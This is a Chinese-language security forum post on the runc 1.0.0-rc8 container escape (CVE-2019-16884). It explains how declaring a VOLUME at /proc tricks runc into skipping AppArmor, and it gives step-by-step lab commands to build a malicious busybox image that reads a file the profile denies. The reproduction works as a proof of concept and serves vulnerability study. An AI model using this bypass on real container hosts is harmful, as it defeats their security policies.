runc 1.0.0-rc8 容器逃逸漏洞：绕过AppArmor限制的安全威胁与应对策略-山海云端论坛

影响范围

runc 1.0.0-rc8

漏洞类型

容器逃逸漏洞

利用条件

影响范围应用

漏洞概述

在Docker 19.03. 2-ce和其他产品中使用的runc 1.0.0-rc8允许绕过AppArmor限制，因为libcontainer/rootfs_linux.go错误地检查装载目标，攻击者可以在容器镜像中可以声明一个VOLUME并挂载至/proc，之后欺骗runc使其认为AppArmor已经成功应用从而绕过AppArmor策略，该漏洞由Adam Iwaniuk发现并在DragonSector CTF 2019期间披露，这个CTF题目挑战将一个文件挂载到/flag-<random>，并使用AppArmor策略拒绝访问该文件，选手可以利用这个漏洞来禁用这个策略并读取文件

漏洞环境

构建实验环境：

docker run -it ssst0n3/docker_archive:CVE-2019-16884

ubuntu login: root
Password: root

漏洞复现

Step 1：创建apparmor规则

cat > /etc/apparmor.d/no_flag <<EOF
#include <tunables/global>

profile no_flag flags=(attach_disconnected,mediate_deleted) {
  #include <abstractions/base>
  file,
  deny /flag r,
}
EOF

Step 2：创建一个flag文件

echo "Al1ex is comming" > /tmp/flag

Step 3：应用规则

/sbin/apparmor_parser --replace --write-cache /etc/apparmor.d/no_flag

Step 4：启动一个正常镜像此时无权限读取/flag内容

docker run --rm --security-opt "apparmor=no_flag" -v /tmp/flag:/flag busybox cat /flag
cat: can't open '/flag': Permission denied

Step 4：利用漏洞启用一个恶意镜像，可以读取/flag

mkdir -p rootfs/proc/self/{attr,fd}
touch rootfs/proc/self/{status,attr/exec}
touch rootfs/proc/self/fd/{4,5}

cat <<EOF > Dockerfile
FROM busybox
ADD rootfs /
    
VOLUME /proc
EOF

docker build -t apparmor-bypass .
    
docker run --rm --security-opt "apparmor=no_flag" -v /tmp/flag:/flag apparmor-bypass cat /flag
Al1ex is comming!!!
docker: Error response from daemon: cannot start a stopped process: unknown.

安全建议

升级到最新版本

版权声明 1 本网站名称：山海云端-专注于PHP与网络安全
2 本站永久网址：www.shserve.cn
3 本网站的文章部分内容可能来源于网络，仅供大家学习与参考，如有侵权，请联系站长 QQ1790643379进行删除处理。
4 本站一切资源不代表本站立场，并不代表本站赞同其观点和对其真实性负责。
5 本站一律禁止以任何方式发布或转载任何违法的相关信息，访客发现请向站长举报
6 本站资源大多存储在云盘，如发现链接失效，请联系我们我们会第一时间更新。

THE END